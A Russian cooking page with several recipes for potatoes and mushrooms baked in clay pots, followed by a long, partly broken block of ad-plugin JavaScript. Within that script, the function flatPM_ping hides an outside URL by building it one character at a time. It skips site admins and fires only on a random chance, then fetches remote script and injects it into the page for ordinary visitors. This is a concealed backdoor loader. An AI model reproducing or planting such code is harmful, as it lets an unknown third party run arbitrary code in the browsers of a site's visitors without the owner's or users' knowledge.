Картошка с грибами в горшочках

Как приготовить картошку с грибами в горшочках

Картофель, приготовленный в горшочках – блюдо, которое довольно часто подается во многих семьях. Он всегда получается мягким, нежным, а если добавить к нему другие продукты, то его вкус полностью изменится. Подавать такое блюдо можно не только на ужин, но и радовать им своих гостей и родных.

Ингредиенты Количество
шампиньонов – 200 грамм
соли – по вкусу
майонеза – 10 столовых ложек
картофеля – 1,2 кг
луковиц – 3 шт.
Время приготовления: 80 минут Калорийность на 100 грамм: 134 Ккал

Для такого блюда лучше всего использовать свежие грибы, но если в доме есть замороженные или сушеные, то можно приготовить и из них.

  1. Шампиньоны помыть, почистить, нарезать пластинками и отварить их 5 минут в воде, просушить;
  2. Очистить картофель, помыть его и порезать дольками;
  3. Лук почистить, порезать его небольшими кубиками, выложить на сковородку и обжарить на масле до прозрачности, добавить грибы, соль, готовить еще 5 минут;
  4. В горшочки налить по 150 миллилитров воды, положить картофель, жареные овощи, специи, накрыть крышками;
  5. Запекать 50 минут в духовке при 180 градусах;
  6. Готовый картофель полить сверху майонезом, поставить обратно в выключенную духовку, чтобы блюдо настоялось.

При желании, во время приготовления можно использовать овощи, а также все виды грибов, пригодных для жарки, которые сделают блюдо более сочным.

Запеченная картошка с грибами со сметаной

Картофель со сметаной и грибами, приготовленный в порционных горшочках обязательно понравится и взрослым и детям. Готовить его очень просто и на это уходит совсем немного времени.

  • 900 грамм картофеля;
  • розмарин;
  • 1 стакан сметаны;
  • шампиньоны – 350 грамм;
  • луковица;
  • подсолнечное масло.

Время приготовления: 75 минут.

Калорийность на 100 грамм: 145 ккал.

  1. Шампиньоны чистятся, быстро промываются под проточной водой, просушиваются и нарезаются кусочками;
  2. Лук режется кубиками, обжаривается до мягкости, к нему выкладываются шампиньоны, все перемешивается и тушится 10 минут;
  3. В сковороду с луком налить половину сметаны, положить розмарин, соль, перемешать;
  4. Картофель чистится, моется, нарезается кубиками небольшого размера и обжаривается на сковороде с маслом;
  5. Горшочки заполняются на 1/3 картофелем, сверху выкладываются шампиньоны со сметаной, затем еще картофель, все заливается водой, поливается сметаной;
  6. Запекать в духовке 45 минут.

Такое вкусное блюдо лучше всего подавать в горшочках, получается очень необычно и по-домашнему.

Возьмите на заметку нашу подборку рецептов гарнира из картофеля. Эти блюда помогут вам сделать меню более разнообразным даже если есть всего один картофель.

Читайте как приготовить кофе по-ирландски с ликером — напиток очень нежный и в то же время густой и ароматный.

На десерт можно приготовить хрустящие трубочки с белковым кремом.

Картошка с курицей и шампиньонами

Из доступных, казалось бы, простых ингредиентов, всегда можно создать что-то вкусное и изысканное. Картофель с мясом и грибами в маленьких и красивых горшочках можно с гордостью поставить на стол, а гости будут в восторге от этого блюда.

  • 0,5 килограмма куриного мяса;
  • соль;
  • шампиньоны – 250 грамм;
  • морковь – 1 штука;
  • зелень;
  • специи;
  • картофель – 700 грамм;
  • лук – 1 штука;
  • тимьян;
  • чеснок – 2 дольки;
  • масло подсолнечное.

Время приготовления: 80 минут.

Калорийность на 100 грамм: 180 ккал.

  1. Почистить лук с морковью, нарезать кубиками, выложить на разогретую сковороду и обжарить;
  2. Нарезать пластинками шампиньоны и отправить их на сковородку к овощам, протушить 10 минут, чтобы лишняя влага испарилась, добавить измельченный чеснок, тимьян, перемешать;
  3. Филе нарезать кусочками, выложить его на низ двух горшочков, сверху положить слой порезанного кубиками картофеля, жареные овощи;
  4. В одном стакане воды растворить чайную ложку соли, залить этим раствором содержимое двух горшочков;
  5. Поместить горшочки в духовку, включить ее на 240 градусов и готовить на протяжении часа;
  6. Зелень мелко порезать, посыпать ею блюдо, накрыть крышечкой и дать 10 минут настояться.

Зелень, тимьян и чеснок придают блюду необычный вкус и аромат, но их не должно быть очень много, особенно если оно готовится и для детей.

Подсказки кулинаров на заметку

Готовить картофель в горшочках очень просто и легко, но для праздничного застолья очень важно рассчитывать необходимое количество порций. Каждому гостю – свой горшочек, если блюдо готовится порционно. Его размер не должен быть очень большим, поэтому идеальный объем – 0,5 литра, чтобы подача была оригинальной и необычной.

Чтобы горшки не треснули, их нужно ставить только в не разогретую духовку на специальные или деревянные подставки и только после этого устанавливать режим приготовления блюда. Посуда будет прогреваться постепенно, а это предотвратит растрескивания.

Для приготовления еды, лучше всего использовать керамические емкости, которые обеспечивают равномерный нагрев и долго хранят тепло. Стеклянная посуда прогревается не равномерно, поэтому блюдо может получиться наполовину сырым.

Блюдо получится более ароматным, если использовать свежие грибы. Замороженные немного теряют свой аромат, кроме того, их нужно предварительно подготовить и удалить из них лишнюю влагу. Сушеные грибы наоборот, делают картофель еще вкуснее, особенно если их сочетать со свежими шампиньонами, лисичками, вешенками, белыми и другими лестными грибами.

Тимьян, розмарин, лавровый листья, молотый перец, чеснок и многие другие специи сделают вкус картофеля с грибами более насыщенным, поэтому можно смело фантазировать, но не слишком увлекаться ими.

Картошка, запеченная в горшочках с лесными грибами и овощами

Описание


Давайте приготовим картошку с грибами в горшочках. На первый взгляд простое и обычное блюдо, скажите вы. В коей то мере я с вами соглашусь. Да, продукты самые обычные, которые есть у каждого на кухне. Но картошку я предлагаю запечь в духовке с лесными грибами в горшочках, которые заполним сметанным соусом с зеленью и чесноком. С таким соусом я люблю подавать кабачковые оладушки.

Вся эта вкуснятина будет запекаться под корочкой сыра и несолёной брынзой. Звучит заманчиво? А выглядит аппетитно и очень вкусно!

Ингредиенты:

  • картошка – 1 кг.,
  • лесные маринованные грибы – 300 гр.,
  • одна большая луковица,
  • морковь – 1 шт.,
  • раст. масло – 3 ст. ложки,
  • соль – по вкусу,
  • чеснок – 4 зубчика,
  • зелень измельченного укропа – 2 ст. ложки,
  • сметана – 150 мл.,
  • молоко – 100 мл.,
  • кусочек сыра или несоленая брынза (каш) – 150 гр.

Как приготовить:

В этом нет ничего сложного. Технология приготовления такая же как и на жаркое в горшочках.

Картошку очистить, промыть хорошо и порезать на маленькие ломтики (квадратики). Чтоб приготовить картошку с грибами в горшочках, я взяла маринованные лесные грибы, вместо которых можно смело положить всеми доступные свежие грибы шампиньоны.

Как свежие, так и маринованные грибы нужно обжарить на раст. масле. Но сначала возьмём одну большую очищенную луковицу и мелко порежем. Затем отправим её на горячую сковороду с раст. маслом и слегка подрумяним. Дальше я добавила кубиками нарезанную морковь.

Морковку, кстати, не обязательно класть. Но мне очень нравится присутствие этого оранжевого цвета в блюде.

Пока пассируются овощи, маринованные грибы выложить на дуршлаг и дать всему рассолу стечься. Если они большие, разрежьте их желаемого размера и поместить в сковороду с овощами. Посолить и поперчить по вкусу. Жарить всё вместе около 5 минут, при постоянном помешивании. После чего сковороду снять с огня и можно приступить к наполнению горшочков овощами.

В чистые, сухие горшочки, первым слоем, выкладываем нарезанный картофель, на 1/3 всего объёма и солим слегка. Следом добавляем по 1-2 столовой ложке жаренных грибов с овощами.

Дальше снова картошка, соль и оставшиеся грибочки, по плечики горшочков.

Как известно, грибы хорошо сочетаются с чесноком, поэтому где грибы, я всегда кладу чеснок. Его нужно очистить и пропустить через чесночницу или мелко-мелко порезать. В небольшую миску налить сметану и соединить с измельченным чесноком. Посолить и добавить мелко порезанный укроп: свежий или сухой, нет разницы. Хорошо всё перемешать. Масса получается довольно густой, поэтому можно разбавить сметану, либо кипячённой водичкой или молоком. И залить получившейся смесью наши горшочки с картошкой и грибами.

Теперь, по традиции или на любителя, горшочки с картошкой нужно заполнить последним слоем – тёртым сыром. Два горшочка я добавила сыр, а в остальные два положила тёртую несолёную брынзу. Мы называем её каш.

Горшочки с картошкой и грибами накрыть крышечками и отправить в разогретую духовку на 1 час и 20-30 минут. Готовность блюда зависит от картошки. Если она мягкая – значит готово. В конце приготовления в каждом горшочке образовалась вот такая красивая румяная корочка.

Картошка с грибами в горшочках испеклась. Теперь её можно переложить на тарелки, посыпать свежей зеленью петрушки и подавать на стол.

Картошка с грибами в горшочках в духовке

Всем известно, что блюда, запеченные в горшочках, выходят наиболее вкусными и ароматными. Из этой статьи вы узнаете, как приготовить в духовке грибы с картошкой в горшочках.

Картошка в горшочках с курицей и грибами

  • картофель – 1 кг;
  • шампиньоны – 400 г;
  • лук – 2 шт.;
  • морковь – 1 шт.;
  • филе курицы – 400 г;
  • майонез – 100 г.

Грибы отвариваем, затем процеживаем и нарезаем кубиками. Отправляем их на сковороду и обжариваем на растительном маслице. Картошку чистим, тоже режем кубиками и также обжариваем до полуготовности. С куриным филе поступаем так же. Мелко крошим лук, трем на терке морковь и пассируем овощи до легкой румяности. Все подготовленные таким образом ингредиенты помещаем в горшочки: филе, грибы, которые поливаем майонезом. Затем картофель и лук с морковью. Вливаем в горшочки воду примерно до половины. Закрываем их крышечками и ставим в разогретую духовку. Запекаем до готовности и наслаждаемся неповторимым вкусом и ароматом готового блюда.

Картошка с грибами в горшочках со сметаной

  • картофель – 1,2 кг;
  • лук – 150 г;
  • шампиньоны свежие – 450 г;
  • майонез – 40 г;
  • сметана – 230 г;
  • перец;
  • соль;
  • масло растительное – 60 мл.

Шампиньоны моем и нарезаем пластинками. Лучок также чистим и меленько крошим. В сковороду наливаем немного масла, слегка обжариваем в нем лук, потом добавляем шампиньоны, накрываем сковороду крышкой и тушим грибочки до их готовности. Тем временем подготовим картошку: чистим ее и режем брусочками, а затем уже обжариваем до румяности. Теперь возвращаемся к нашим грибочкам: кладем в них половину сметаны и подсаливаем. Горшочки наполняем картошкой примерно на 1/3 , потом кладем столько же грибов, потом снова слой картофеля. Вливаем воду, чтобы она почти полностью покрыла содержимое. Далее сметану смешиваем с майонезом и полученный соус выкладываем сверху картошки. Ставим горшочки в хорошо нагретую духовку, ждем, пока жидкость в них закипит. Затем огонь убавляем и готовим наше блюдо еще минут 20.

Картошка с сушеными грибами, запеченная в горшочках

  • картофель – 2 кг;
  • белые грибы сухие – 250 г;
  • лук – 1 шт.;
  • сметана – 1 стакан;
  • молоко – 500 мл;
  • черный молотый перец;
  • соль.

Сперва нужно размочить сухие грибы, для этого заливаем их холодной водой и оставляем часика на 2, потом воду сливаем, грибы промываем и режем кусочками. Заливаем их молоком и оставляем еще на часик. Картошку чистим и режем брусочками. Грибы в молоке ставим на огонь и тушим минут 40. Лук меленько нарезаем и обжариваем на масле, кладем его к грибам и готовим еще минут 15. В горшочки для запекания выкладываем картошку, тушеные грибы, солим, перчим, перемешиваем, сверху выливаем сметану и запекаем картошку с сушеными грибами в горшочках при высокой температуре до готовности.

Картошка с грибами в горшочке – рецепт

  • картофель – 6 шт.;
  • молоко – 100 мл;
  • сушеные белые грибы – 120 г;
  • голландский сыр – 100 г;
  • лук – 1 шт.;
  • вода – 200 мл;
  • масло оливковое;
  • соль.

Сушеные белые грибы кладем в миску и заливаем холодной водой. Оставляем на час – за это время они хорошо увеличатся в размерах. Картошку чистим и режем кусочками. Сковороду ставим на огонь, наливаем в нее оливковое масло и выкладываем картошку. Лук режем полукольцами и тоже отправляем на сковороду. Грибы из миски извлекаем при помощи шумовки, кладем их также к картошке, все солим и перемешиваем. Обжариваем не до готовности, а до того момента, как на картошке образуется румяная корочка. Далее распределяем содержимое сковороды по горшочкам. А теперь берем ту воду, где размачивались грибы, и заливаем ею картошку в горшочках. То же самое делаем и с молоком. В каждую порцию кладем ломтик сыра и закрываем емкости крышечками. Отправляем в нагретую духовку и запекаем минут 40. А далее достаем и подаем к столу – можно выложить на тарелочки картошку с грибами, а можно подать и прямо в горшочках.

Грибы в горшочках с картошкой

Грибы в горшочках – замечательный сытный обед или ужин.

Прекрасная солнечная пора давно нас покинула, уже и осень распрощалась с нами, да и морозная зима сдала свои позиции.… И вот в пришедшие на смену весенние деньки особенно сильно хочется вновь испытать удовольствие от блюд, в которых будут присутствовать летние или на крайний случай осенние продукты.

И если у вас в морозильной камере одиноко лежат без дела грибы, заготовленные ранее, то самое время их оттуда достать и что-то вкусное приготовить.

Грибы в горшочках с картошкой

А чтобы грибы получились еще вкуснее, сделаем их в горшочках с картошечкой. Ингредиенты, представленные в данном рецепте, будут использованы для приготовления двух горшочков необыкновенно вкусного блюда.
Белый сметанно-сырный соус в этом рецепте можно заменить и красным, который делается, например, на основе томатов, лука и перца. Для этого указанные овощи можно протушить с небольшим количеством воды и любимыми специями, а затем перемолоть в блендере.

как приготовить грибы с картошкой в духовке пошаговый фото рецепт

Ингредиенты:

Процесс приготовления:

Репчатый лук очистим и порежем четвертинами колец.

Картофель будем нарезать такими кусочками, чтобы они были близки по размеру с грибами (для соблюдения текстуры).

Грибы нарезаем и тут же отправляем их на сковороду, где уже хорошо прогрета смесь растительного и сливочного масел. Обжариваем грибы на среднем огне, постоянно помешивая, пока из них не выпарится лишняя влага. Пусть на это уйдет порядка 7-8 минут.

Теперь отправляем в сковороду к грибам лук. Перемешиваем, солим-перчим и жарим еще 5 минут, не забывая, конечно же, все иногда помешивать.

Ну, самое время собирать ингредиенты по горшочкам. Но сначала включим духовку и установим температуру нагрева до 200 градусов. Итак, первый слой – картофель. На него укладываем грибы.

Грибы укрываем сметаной, затем докладываем остатки картофеля, на который тоже отправляется слой сметаны. У нас еще остался сыр. На верхушку «конструкции» в горшочки выкладываем по два-три тонких ломтика плавленого сыра. Вливаем немного воды, накрываем крышкой и отправляем грибы в горшочках в духовку на 45 минут.

Вкусные грибы с картошкой, сметаной и сыром в горшочках готовы! Готовое блюдо слегка остужаем и подаем к столу. Приятного аппетита!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};